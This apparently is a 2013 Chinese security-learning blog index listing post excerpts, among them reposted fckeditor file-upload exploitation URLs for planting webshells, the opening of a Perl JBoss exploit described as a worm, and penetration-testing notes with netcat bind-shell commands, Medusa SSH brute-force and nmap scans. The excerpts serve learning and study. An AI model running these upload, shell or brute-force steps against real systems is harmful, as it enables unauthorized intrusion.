- 博客(14)
- 资源 (11)
- 收藏
- 关注
原创 循序渐进,碰到什么学什么
apache + php + mysql什么是CDNWxPythonapache + php的安装FastCGIjetty是虾米apache的配置Lighttpd是虾米fckeditor上传漏洞apache .htaccessnginx是虾米jsp建站网站防盗链反向代理php建站php的配置me
2013-03-11 16:29:30 949
转载 fckeditor asp 漏洞利用
出现上传漏洞的地址是: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是: http://www.xxx.co
2013-03-31 01:19:01 1685
转载 fckeditor jsp 漏洞利用
Fckeditor jsp版漏洞利用方法:http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图
2013-03-31 01:05:23 1667
转载 jboss HEAD exp
发一下最近整理的一个小东西吧。JBOSS蠕虫。。。首先发一个exp#!/usr/bin/perl use IO::Socket; print "JBoss Exp...\n"; if(@ARGV!=2){ print "perl $0 \n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $xkcmd = "HEAD /jmx-console/
2013-03-30 18:50:44 1425
原创 《渗透测试实践指南》读书笔记之后门和rootkit
瑞士军刀:NetCat监听方:nc -l -p 1234连接方:nc ip 1234传文件:nc -l -p 7777 > calc.exenc ip 7777 < calc.exe打开shell:-e参数nc -l -p 8888 -e /bin/shnc.exe -L -p 8888 -e c:\windows\system32\cmd.exeNetCat的加密版本:
2013-03-30 14:58:01 1222
原创 《渗透测试实践指南》读书笔记之漏洞利用
远程密码破解:Medusa,Hydramedusa -h target_ip -U user_list -P pass_dict -M service_to_attack如:medusa -h 192.168.1.10 -u ownedb -P /pentest/passwords/wordlists/darkc0de.lst -M sshMeterpreter shellmigra
2013-03-29 16:52:41 1186
原创 《渗透测试实践指南》读书笔记之扫描
批量ping工具:fpingbt中已集成fping -a -g 192.168.1.1 192.168.1.254>hosts.txt;man fping端口扫描:nmapTCP连接扫描:nmap -sT -p- -PN 192.168.1.10,nmap -sT -p- -PN 192.168.1.10-254SYN扫描:nmap -sS -p- -PN 192.16
2013-03-29 09:51:50 1202
原创 《渗透测试实践指南》读书笔记之信息搜集
主动侦察:与目标交互,可能会被记录。被动侦察:无交互。HTTrack:网站复制下载地址:www.httrack.com安装:windows傻瓜式;bt下运行“apt-get install webhttrack”仔细浏览目标网站,关注细节。物理地址和位置、电话号码、电子邮箱地址、运营时间、商业关系、员工姓名、与社会媒体的联系,花絮新闻等。关注新闻和公告,可能会发现有用的信息
2013-03-28 18:58:07 1672
原创 网站防盗链的方法
8种防盗链方法:http://www.code-123.com/html/2008814181422580.htmlapache防盗链(Anti-Leech)技术的简单实现:http://www.xiaohui.com/dev/server/20070330-apache-anti-leech.htmapache & nginx 防盗链设置:http://www.cnp
2013-03-11 11:42:04 884
原创 apache .htaccess介绍
.htaccess入门教程:http://www.cnphp.info/htaccess-beginer.html.htaccess rewrite规则详细说明:http://www.cnphp.info/?p=216
2013-03-11 10:21:14 954
原创 windows xp sp2 系统,apache php环境安装过程
1、安装apache 当前windows下的最新版是httpd-2.2.22-win32-x86-no_ssl.msi,可到http://httpd.apache.org/download.cgi下载。 安装过程截图参考:http://server.chinabyte.com/13/2475513.shtml 配置文件为:C:\Program Files\Apa
2013-03-06 15:53:01 966
原创 wxPython写的简单md5破解程序
# -*- coding: cp936 -*-import wximport osimport hashlibclass TextFrame(wx.Frame): def __init__(self): wx.Frame.__init__(self, None, -1, 'md5Cracker By blrk', size=(500, 300));
2013-03-01 15:15:33 674
MySQL-python-1.2.5.win-amd64-py2.7.exe
2017-11-24
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人